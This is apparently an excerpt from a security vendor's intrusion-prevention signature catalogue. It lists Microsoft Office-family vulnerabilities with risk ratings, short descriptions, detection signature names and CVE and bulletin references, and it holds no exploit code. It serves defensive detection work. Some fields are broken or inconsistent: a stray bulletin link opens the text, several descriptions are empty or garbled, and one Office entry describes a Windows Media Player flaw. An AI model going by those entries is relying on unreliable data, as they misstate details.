http://technet.microsoft.com/security/bulletin/MS08-044

Microsoft-Office-Pict-Image-Converter-Integer-Overflow

About this vulnerability:

A vulnerability in Microsoft Office

Risk:

Moderate

First detected in:

sgpkg-ips-384-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office XP; Microsoft Office 2003; Microsoft Office Converter Pack

Type:

Integer Overflow

Description:

A buffer overflow vulnerability exists in Microsoft Office. The vulnerability is due to the way Office allocates a buffer size when handling PICT image files. An attacker can leverage this vulnerability by enticing a target user to open a malicious file. Successful exploitation would allow an attacker to execute arbitrary code in the security context of the logged in user. An unsuccessful attack could cause an abnormal termination of the affected product.

Situation:

HTTP_SS-Microsoft-Office-Pict-Image-Converter-Integer-Overflow
File-Binary_Microsoft-Office-Pict-Image-Converter-Integer-Overflow

References:

CVE-2010-3946
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3946

BID-45273
http://www.securityfocus.com/bid/45273

MS10-105
http://technet.microsoft.com/security/bulletin/MS10-105

Microsoft-Office-PowerPoint-Animation-Code-Execution-CVE-2010-2573

About this vulnerability:

Code execution vulnerability in Microsoft PowerPoint

Risk:

High

First detected in:

sgpkg-ips-353-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

Microsoft PowerPoint

Type:

Malfunction

Description:

There is a code execution vulnerability in Microsoft PowerPoint. By persuading a target user to open a malicious Microsoft PowerPoint file with a vulnerable version of the affected product, a remote attacker can execute arbitrary code with the privileges of the currently logged in user.

Situation:

E-Mail_BS-Microsoft-Office-PowerPoint-Animation-Code-Execution-CVE-2010-2573
HTTP_SS-Microsoft-Office-PowerPoint-Animation-Code-Execution-CVE-2010-2573
File-OLE_Microsoft-Office-PowerPoint-Animation-Code-Execution-CVE-2010-2573

References:

CVE-2010-2573
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2573

MS10-088
http://technet.microsoft.com/security/bulletin/MS10-088

Microsoft-Office-PowerPoint-FB1h-Parsing-BOF-CVE-2010-2572

About this vulnerability:

Code execution vulnerability in Microsoft PowerPoint

Risk:

High

First detected in:

sgpkg-ips-353-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

Microsoft PowerPoint

Type:

Malfunction

Description:

Situation:

E-Mail_BS-Microsoft-Office-PowerPoint-FB1h-Parsing-BOF-CVE-2010-2572
HTTP_SS-Microsoft-Office-PowerPoint-FB1h-Parsing-BOF-CVE-2010-2572
File-OLE_Microsoft-Office-PowerPoint-FB1h-Parsing-BOF-CVE-2010-2572

References:

CVE-2010-2572
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2572

MS10-088
http://technet.microsoft.com/security/bulletin/MS10-088

Microsoft-Office-PowerPoint-Invalid-Object-Reference-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Office PowerPoint

Risk:

High

First detected in:

sgpkg-ips-384-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft PowerPoint; Microsoft Office 2004; Microsoft Office

Type:

Malfunction

Description:

A memory corruption vulnerability exists in Microsoft Office PowerPoint. The flaw is due to accessing invalid object in malicious PowerPoint (PPT) documents. An attacker could exploit this vulnerability by persuading the target user to open a specially crafted PowerPoint document. In an attack case where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The injected code in such a case would execute within the security context of the logged in user. In an attack case where code injection is not successful, the affected application will terminate abnormally, potentially resulting in loss of unsaved data.

Situation:

HTTP_SS-Microsoft-Office-PowerPoint-Invalid-Object-Reference-Code-Execution
File-OLE_Microsoft-Office-PowerPoint-Invalid-Object-Reference-Code-Execution

References:

CVE-2009-0556
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0556

BID-34351
http://www.securityfocus.com/bid/34351

OSVDB-53182
http://www.osvdb.org/53182

MS09-017
http://technet.microsoft.com/security/bulletin/MS09-017

Microsoft-Office-PowerPoint-MS09-017

About this vulnerability:

A vulnerability in Microsoft Office PowerPoint

Risk:

Moderate

First detected in:

sgpkg-ips-467-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft PowerPoint; Microsoft Office

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Microsoft PowerPoint. The flaw is due to a boundary error when processing crafted legacy PowerPoint (PPT) documents. An attacker could exploit this vulnerability by persuading the target user to open a specially crafted legacy PowerPoint document. In an attack case where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The injected code in such a case would execute within the security context of the logged in user. In an attack case where code injection is not successful, the affected application will terminate abnormally, potentially resulting in loss of unsaved data.

Situation:

File-OLE_Microsoft-Office-PowerPoint-MS09-017

References:

CVE-2009-0220
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0220

BID-34833
http://www.securityfocus.com/bid/34833

OSVDB-54386
http://www.osvdb.org/54386

MS09-017
http://technet.microsoft.com/security/bulletin/MS09-017

Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0029

About this vulnerability:

Code execution vulnerability in Microsoft PowerPoint

Risk:

High

First detected in:

sgpkg-ips-284-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

Microsoft PowerPoint

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Microsoft PowerPoint. By persuading a target user to open a maliciously named Microsoft PowerPoint file with a vulnerable version of the affected product, a remote attacker can execute arbitrary code with the privileges of the currently logged in user.

Situation:

HTTP_CSU-Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0029
HTTP_SHS-Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0029

References:

CVE-2010-0029
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0029

MS10-004
http://technet.microsoft.com/security/bulletin/MS10-004

Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0031

About this vulnerability:

Code execution vulnerability in Microsoft PowerPoint

Risk:

High

First detected in:

sgpkg-ips-281-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

Microsoft PowerPoint

Type:

Malfunction

Description:

Situation:

HTTP_SS-Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0031
E-Mail_BS-Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0031
File-OLE_Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0031

References:

CVE-2010-0031
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0031

MS10-004
http://technet.microsoft.com/security/bulletin/MS10-004

Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0032

About this vulnerability:

Code execution vulnerability in Microsoft PowerPoint

Risk:

High

First detected in:

sgpkg-ips-281-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

Microsoft PowerPoint

Type:

Malfunction

Description:

Situation:

HTTP_SS-Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0032
E-Mail_BS-Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0032
File-OLE_Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0032

References:

CVE-2010-0032
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0032

MS10-004
http://technet.microsoft.com/security/bulletin/MS10-004

Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0033

About this vulnerability:

Code execution vulnerability in Microsoft PowerPoint

Risk:

High

First detected in:

sgpkg-ips-281-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

Microsoft PowerPoint

Type:

Malfunction

Description:

Situation:

HTTP_SS-Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0033
E-Mail_BS-Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0033
File-OLE_Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0033

References:

CVE-2010-0033
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0033

MS10-004
http://technet.microsoft.com/security/bulletin/MS10-004

Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0034

About this vulnerability:

Code execution vulnerability in Microsoft PowerPoint

Risk:

High

First detected in:

sgpkg-ips-282-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

Microsoft PowerPoint

Type:

Malfunction

Description:

Situation:

HTTP_SS-Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0034
E-Mail_BS-Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0034
File-OLE_Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0034

References:

CVE-2010-0034
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0034

MS10-004
http://technet.microsoft.com/security/bulletin/MS10-004

Microsoft-Office-Publisher-Invalid-Memory-Reference

About this vulnerability:

A vulnerability in Microsoft Publisher

Risk:

Moderate

First detected in:

sgpkg-ips-385-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Publisher; Microsoft Office

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Microsoft Office Publisher. The vulnerability is due to improper handling of user-supplied data without sufficient validation. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted PUB file, potentially causing memory corruption and arbitrary code to be injected and executed in the security context of the current user.

Situation:

HTTP_SS-Microsoft-Office-Publisher-Invalid-Memory-Reference
File-OLE_Microsoft-Office-Publisher-Invalid-Memory-Reference

References:

CVE-2008-0102
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0102

BID-27739
http://www.securityfocus.com/bid/27739

MS08-012
http://technet.microsoft.com/security/bulletin/MS08-012

Microsoft-Office-Remote-Code-Execution-CVE-2016-0012

About this vulnerability:

A vulnerability in Microsoft Office

Risk:

Moderate

First detected in:

sgpkg-ips-720-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft Office

Type:

Malfunction

Description:

A vulnerability in Microsoft Office

Situation:

File-Text_Microsoft-Office-Remote-Code-Execution-CVE-2016-0012

References:

CVE-2016-0012
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0012

MS16-004
http://technet.microsoft.com/security/bulletin/MS16-004

Microsoft-Office-Remote-Code-Execution-CVE-2024-38021

About this vulnerability:

A vulnerability in Microsoft Office

Risk:

High

First detected in:

sgpkg-ips-1750-5242

Last changed:

sgpkg-ips-1750-5242

Platform:

Windows

Software:

Microsoft Office

Type:

Malfunction

Description:

A remote code execution vulnerability has been reported in Microsoft Office.

Situation:

File-Text_Microsoft-Office-Remote-Code-Execution-CVE-2024-38021

References:

CVE-2024-38021
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38021

ms24-jul
http://technet.microsoft.com/security/bulletin/ms24-jul

Microsoft-Office-Remote-Code-Execution-CVE-2025-21365

About this vulnerability:

An attempt to exploit a vulnerability in Microsoft Office detected

Risk:

High

First detected in:

sgpkg-ips-1824-5242

Last changed:

sgpkg-ips-1824-5242

Platform:

Windows

Software:

Microsoft Office

Type:

Input Validation

Description:

Microsoft Office's remote code execution vulnerability CVE-2025-21365.

Situation:

File-Zip_Microsoft-Office-Remote-Code-Execution-CVE-2025-21365

References:

CVE-2025-21365
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21365

ms25-jan
http://technet.microsoft.com/security/bulletin/ms25-jan

Microsoft-Office-RTF-Stack-Overflow-CVE-2010-3333

About this vulnerability:

A vulnerability in Microsoft Office

Risk:

High

First detected in:

sgpkg-ips-353-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office XP; Microsoft Office 2003; Microsoft Office 2007; Microsoft Office 2010; Microsoft Office 2004; Microsoft Office 2008

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Office.

Situation:

HTTP_SS-Microsoft-Office-RTF-Stack-Overflow-CVE-2010-3333
File-RTF_Microsoft-Office-RTF-Stack-Overflow-CVE-2010-3333

References:

CVE-2010-3333
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3333

BID-44652
http://www.securityfocus.com/bid/44652

OSVDB-69085
http://www.osvdb.org/69085

MS10-087
http://technet.microsoft.com/security/bulletin/MS10-087

Microsoft-Office-Security-Feature-Bypass-CVE-2023-36413

About this vulnerability:

An attempt to exploit a vulnerability in Microsoft Office detected

Risk:

High

First detected in:

sgpkg-ips-1651-5242

Last changed:

sgpkg-ips-1651-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

This detects Microsoft Office security feature bypasses, in which Microsoft Office fails to enforce Protected View on documents downloaded from the Internet, potentially allowing macros to be enabled or other dangerous activities.

Situation:

File-Name_Microsoft-Office-Security-Feature-Bypass-CVE-2023-36413

References:

CVE-2023-36413
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-36413

ms23-nov
http://technet.microsoft.com/security/bulletin/ms23-nov

Microsoft-Office-SharePoint-Server-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Microsoft Office SharePoint Server

Risk:

High

First detected in:

sgpkg-ips-1216-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office SharePoint Server; Microsoft SharePoint Foundation

Type:

Cross-site Scripting

Description:

There exists a cross-site scripting vulnerability in Microsoft SharePoint Enterprise Server 2016, and Microsoft SharePoint Foundation 2013 Service Pack 1, which allows a remote attacker to execute arbitrary JavaScript code by sending a maliciously crafted request.

Situation:

HTTP_CRL-Microsoft-Office-SharePoint-Server-Cross-Site-Scripting

References:

CVE-2019-1070
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1070

Microsoft-Office-Sharepoint-Server-help.aspx-Cross-Site-Scripting

About this vulnerability:

A cross-site scripting vulnerability in Microsoft Office SharePoint Server

Risk:

Moderate

First detected in:

sgpkg-ips-303-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office SharePoint Server

Type:

Cross-site Scripting

Description:

There is a cross-site scripting vulnerability in Microsoft Office SharePoint Server. A remote attacker can exploit this vulnerability by embedding malicious HTML or script code as a part of a URL, to be executed in the target user's browser with the privileges of the website.

Situation:

HTTP_CRL-Microsoft-Office-Sharepoint-Server-help.aspx-Cross-Site-Scripting

References:

CVE-2010-0817
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0817

BID-39776
http://www.securityfocus.com/bid/39776

MS10-039
http://technet.microsoft.com/security/bulletin/MS10-039

Microsoft-Office-Spoofing-Vulnerability-CVE-2024-38200

About this vulnerability:

A vulnerability in Microsoft Office

Risk:

High

First detected in:

sgpkg-ips-1814-5242

Last changed:

sgpkg-ips-1814-5242

Platform:

Windows

Software:

Microsoft Office

Type:

Malfunction

Description:

A vulnerability in Microsoft Office allows a remote attacker to capture NTLM hashes from the target.

Situation:

File-Text_Microsoft-Office-URI-Scheme-Link-In-HTML

References:

CVE-2024-38200
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38200

ms24-aug
http://technet.microsoft.com/security/bulletin/ms24-aug

Microsoft-Office-Spoofing-Vulnerability-CVE-2024-43609

About this vulnerability:

A vulnerability in Microsoft Office

Risk:

High

First detected in:

sgpkg-ips-1814-5242

Last changed:

sgpkg-ips-1814-5242

Platform:

Windows

Software:

Microsoft Office

Type:

Malfunction

Description:

A vulnerability in Microsoft Office allows a remote attacker to capture NTLM hashes from the target.

Situation:

File-Text_Microsoft-Office-Spoofing-Vulnerability-CVE-2024-43609

References:

CVE-2024-43609
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-43609

ms24-oct
http://technet.microsoft.com/security/bulletin/ms24-oct

Microsoft-Office-Suspicious-Ddeauto-Command

About this vulnerability:	A vulnerability in Microsoft Office
Risk:	Moderate
First detected in:	sgpkg-ips-1560-5242
Last changed:	sgpkg-ips-1560-5242
Platform:	Windows
Software:	Microsoft Office
Type:	Malfunction
Description:	A file that contains a suspicious DDEAUTO command was detected. Dynamic Data Exchangce (DDE) is one of Microsoft Office's methods of transferring data between applications, but it has also been exploited to include malicious content.
Situation:	File-OLE_Microsoft-Office-Suspicious-Ddeauto-Command File-RTF_Microsoft-Office-Suspicious-Ddeauto-Command

Microsoft-Office-Text-Converter-Integer-Underflow-Code-Execution

About this vulnerability:

Integer underflow vulnerability in Microsoft Office Text Convertor

Risk:

High

First detected in:

sgpkg-ips-246-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office

Type:

Malfunction

Description:

There is an integer underflow vulnerability in Microsoft Office Text Convertor. Remote attackers can exploit this vulnerability by enticing a target user to open a malicious Word 6 file, potentially causing arbitrary code to be injected and executed in the security context of the current user.

Situation:

E-Mail_BS-Microsoft-Office-Text-Converter-Integer-Underflow-Code-Execution
HTTP_SS-Microsoft-Office-Text-Converter-Integer-Underflow-Code-Execution
File-OLE_Microsoft-Office-Text-Converter-Integer-Underflow-Code-Execution

References:

CVE-2009-0087
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0087

OSVDB-53662
http://www.osvdb.org/53662

MS09-010
http://technet.microsoft.com/security/bulletin/MS09-010

Microsoft-Office-TIFF-Converter-Heap-Overflow-CVE-2010-3947

About this vulnerability:

A vulnerability in Microsoft Office

Risk:

High

First detected in:

sgpkg-ips-363-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office XP; Microsoft Office 2003; Microsoft Office 2007; Microsoft Office 2010

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Office.

Situation:

HTTP_SS-Microsoft-Office-TIFF-Converter-Heap-Overflow-CVE-2010-3947
File-Binary_Microsoft-Office-TIFF-Converter-Heap-Overflow-CVE-2010-3947

References:

CVE-2010-3947
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3947

MS10-105
http://technet.microsoft.com/security/bulletin/MS10-105

Microsoft-Office-Uninitialized-Memory-Use-Vulnerability-CVE-2015-1770

About this vulnerability:

A vulnerability in Microsoft Office

Risk:

Moderate

First detected in:

sgpkg-ips-652-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2003; Windows Vista; Windows 2008; Windows 7; Windows 2008 R2

Software:

<os>

Type:

Malfunction

Description:

There is a vulnerability in Windows Media Player which could allow remote code execution.

Situation:

File-OLE_Microsoft-Office-Uninitialized-Memory-Use-Vulnerability-CVE-2015-1770
File-RTF_Microsoft-Office-Uninitialized-Memory-Use-Vulnerability-CVE-2015-1770
File-TextId_Microsoft-Office-Uninitialized-Memory-Use-Vulnerability-CVE-2015-1770

References:

CVE-2015-1770
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1770

MS15-059
http://technet.microsoft.com/security/bulletin/MS15-059

Microsoft-Office-Visio-Data-Type-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Visio

Risk:

Moderate

First detected in:

sgpkg-ips-434-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft Visio

Type:

Buffer Overflow

Description:

A code execution vulnerability exists in Microsoft Visio. The vulnerability is due to insufficient validation when processing certain attributes in Visio files. A remote unauthenticated attacker can exploit this vulnerability by enticing a user to download and open a malicious file with an affected version of Visio. In attack scenarios where code execution is successful the behaviour of the target machine is dependent entirely on the intention of the injected code, which will run within the security context of the target user. When code execution is not successful the affected application may terminate abnormally leading to a denial of service condition.

Situation:

File-OLE_Microsoft-Office-Visio-Data-Type-Memory-Corruption

References:

CVE-2011-0093
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0093

BID-46138
http://www.securityfocus.com/bid/46138

OSVDB-70829
http://www.osvdb.org/70829

MS11-008
http://technet.microsoft.com/security/bulletin/MS11-008

Microsoft-Office-Web-Components-2-MS09-043

About this vulnerability:

Remote code execution vulnerability in Microsoft OWC

Risk:

Moderate

First detected in:

sgpkg-ips-238-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office Web Components

Type:

Malfunction

Description:

There is a remote code execution vulnerability in Microsoft Office Web Components (OWC).

Situation:

HTTP_SS-Microsoft-Office-Web-Components-2-MS09-043
File-Text_Microsoft-Office-Web-Components-2-MS09-043

References:

CVE-2009-1534
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1534

BID-35992
http://www.securityfocus.com/bid/35992

OSVDB-56916
http://www.osvdb.org/56916

MS09-043
http://technet.microsoft.com/security/bulletin/MS09-043

Microsoft-Office-Web-Components-Code-Execution-CVE-2009-1136

About this vulnerability:

A vulnerability in Microsoft Web Components

Risk:

High

First detected in:

sgpkg-ips-230-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office XP; Microsoft Office 2003; Microsoft Office Web Components

Type:

Input Validation

Description:

There is a remote code execution vulnerability in Microsoft Office Web Components.

Situation:

HTTP_SS-Microsoft-Office-Web-Components-Code-Execution-CVE-2009-1136
HTTP_SS-Microsoft-Office-Web-Components-Code-Execution-Exploit-MS09-043
File-Text_Microsoft-Office-Web-Components-Code-Execution-Exploit-MS09-043
File-Text_Microsoft-Office-Web-Components-Code-Execution-CVE-2009-1136

References:

CVE-2009-1136
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1136

MS09-043
http://technet.microsoft.com/security/bulletin/MS09-043

Microsoft-Office-Web-Components-MS09-043

About this vulnerability:

Remote code execution vulnerability in Microsoft OWC

Risk:

Moderate

First detected in:

sgpkg-ips-238-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office Web Components

Type:

Malfunction

Description:

There is a remote code execution vulnerability in Microsoft Office Web Components (OWC).

Situation:

HTTP_SS-Microsoft-Office-Web-Components-MS09-043
File-Text_Microsoft-Office-Web-Components-MS09-043

References:

CVE-2009-0562
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0562

BID-35990
http://www.securityfocus.com/bid/35990

MS09-043
http://technet.microsoft.com/security/bulletin/MS09-043

Microsoft-Office-Web-Components-Url-Parsing-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Office

Risk:

High

First detected in:

sgpkg-ips-379-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft Office; Microsoft BizTalk Server; Microsoft Commerce Server; Microsoft Internet Security and Acceleration Server; Microsoft Visual Studio .NET

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in Microsoft Office Web Components. The vulnerability is due to improper handling of certain URLs. Remote attackers can exploit this vulnerability by enticing target users to visit a malicious web page. Successful exploitation would result in code execution in security context of the logged-in user.

Situation:

HTTP_SS-Microsoft-Office-Web-Components-Url-Parsing-Buffer-Overflow
File-Text_Microsoft-Office-Web-Components-Url-Parsing-Buffer-Overflow

References:

CVE-2006-4695
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4695

BID-28135
http://www.securityfocus.com/bid/28135

MS08-017
http://technet.microsoft.com/security/bulletin/MS08-017

Microsoft-Office-Word-And-Web-Apps-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Microsoft Office Web Apps Server

Risk:

Moderate

First detected in:

sgpkg-ips-612-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office

Type:

Malfunction

Description:

A memory corruption vulnerability exists in Microsoft Office Word and Web Apps. The vulnerability is due to insufficient validation of input while processing specially crafted Office files. A remote attacker can exploit this vulnerability by enticing the user to open a specially crafted Word file using the vulnerable software. This can result in arbitrary code execution on the affected machine in the context of the user privilege.

Situation:

File-TextId_Microsoft-Office-Word-And-Web-Apps-Memory-Corruption

References:

CVE-2014-4117
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4117

BID-70360
http://www.securityfocus.com/bid/70360

OSVDB-113190
http://www.osvdb.org/113190

MS14-061
http://technet.microsoft.com/security/bulletin/MS14-061

Microsoft-Office-Word-CVE-2014-6333-Use-After-Free

About this vulnerability:

A vulnerability in Microsoft Office

Risk:

High

First detected in:

sgpkg-ips-619-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office 2007

Type:

Malfunction

Description:

A memory corruption vulnerability exists in Microsoft Office. The vulnerability is due to improper handling of embedded font objects when parsing a specially crafted Office document. Remote, unauthenticated attackers could exploit this vulnerability by enticing a target user to open a specially crafted Office file. Successful exploitation allows the attacker to execute arbitrary code in the context of the current user.

Situation:

File-OLE_Microsoft-Office-Word-CVE-2014-6333-Use-After-Free

References:

CVE-2014-6333
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6333

OSVDB-114528
http://www.osvdb.org/114528

MS14-069
http://technet.microsoft.com/security/bulletin/MS14-069

Microsoft-Office-Word-CVE-2019-0540-Security-Feature-Bypass

About this vulnerability:

A vulnerability in Microsoft Office

Risk:

Moderate

First detected in:

sgpkg-ips-1153-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office

Type:

Malfunction

Description:

An information disclosure vulnerability has been reported in the Word component of Microsoft Office. This vulnerability is due to improper handling of fields. A remote attacker could Improper handling of fields in a Word file causes an information disclosure vulnerability in Microsoft Office.

Situation:

File-OLE_Microsoft-Office-Word-CVE-2019-0540-Security-Feature-Bypass

References:

CVE-2019-0540
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0540

Microsoft-Office-Word-CVE-2019-0561-Information-Disclosure

About this vulnerability:

A vulnerability in Microsoft Office

Risk:

Moderate

First detected in:

sgpkg-ips-1152-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office

Type:

Malfunction

Description:

A vulnerability in MS Word.

Situation:

File-OLE_Microsoft-Office-Word-CVE-2019-0561-Information-Disclosure

References:

CVE-2019-0561
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0561

Microsoft-Office-Word-File-Fib-Processing-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Office Word

Risk:

Moderate

First detected in:

sgpkg-ips-404-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Word

Type:

Buffer Overflow

Description:

A code execution vulnerability has been reported in Microsoft Office Word. The flaw is due to the way the affected product processes specially crafted Word files. A remote attacker can exploit this vulnerability by enticing a target user to open a Word file with a malicious record. Successful exploitation could result in execution of arbitrary code within the security context of the currently logged on user. The behaviour of the target host is entirely dependent on the intended function of the injected code. An unsuccessful exploit attempt may terminate the affected application abnormally.

Situation:

HTTP_SS-Microsoft-Office-Word-File-Fib-Processing-Memory-Corruption
File-OLE_Microsoft-Office-Word-File-Fib-Processing-Memory-Corruption

References:

CVE-2009-3135
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3135

BID-36950
http://www.securityfocus.com/bid/36950

OSVDB-59857
http://www.osvdb.org/59857

MS09-068
http://technet.microsoft.com/security/bulletin/MS09-068

Microsoft-Office-Word-HTML-Linked-Objects-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Office Word

Risk:

Moderate

First detected in:

sgpkg-ips-1035-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Word

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Microsoft Office Word. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-OLE_Microsoft-Office-Word-HTML-Linked-Objects-Memory-Corruption

References:

CVE-2010-1903
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1903

BID-42130
http://www.securityfocus.com/bid/42130

MS10-056
http://technet.microsoft.com/security/bulletin/MS10-056

Microsoft-Office-Word-Sprmcmajority-Record-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Office Compatibility Pack

Risk:

High

First detected in:

sgpkg-ips-378-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft Office Compatibility Pack; Microsoft Office 2004; Microsoft Office 2008; Microsoft Word; Microsoft Open XML File Format Converter; Microsoft Works

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability exists in Microsoft Office Word. The vulnerability is due to a boundary error when handling a malformed sprmCMajority record within Microsoft Office documents. This vulnerability may be exploited by remote attackers to execute arbitrary code on the target system by enticing a user to open a maliciously crafted file. In situations where code execution is successful the injected code will run within the security context of the currently logged in user. If code execution fails, the vulnerable application may terminate abnormally.

Situation:

HTTP_SS-Microsoft-Office-Word-Sprmcmajority-Record-Buffer-Overflow
File-OLE_Microsoft-Office-Word-Sprmcmajority-Record-Buffer-Overflow

References:

CVE-2010-1900
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1900

BID-42136
http://www.securityfocus.com/bid/42136

MS10-056
http://technet.microsoft.com/security/bulletin/MS10-056

Microsoft-Office-Word-Sprmtdiagline80-Record-Parsing-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Office for Mac

Risk:

Moderate

First detected in:

sgpkg-ips-1035-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office 2004; Microsoft Office 2008

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability exists in Microsoft Office Word. The vulnerability is due to a boundary error while parsing a crafted word document. This vulnerability may be exploited by enticing a user to open a maliciously crafted file. In situations where code execution is successful the injected code will run within the security context of the currently logged in user. If code execution fails, the vulnerable application may terminate abnormally.

Situation:

File-OLE_Microsoft-Office-Word-Sprmtdiagline80-Record-Parsing-Stack-Buffer-Overflow

References:

CVE-2010-3214
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3214

BID-43760
http://www.securityfocus.com/bid/43760

MS10-079
http://technet.microsoft.com/security/bulletin/MS10-079

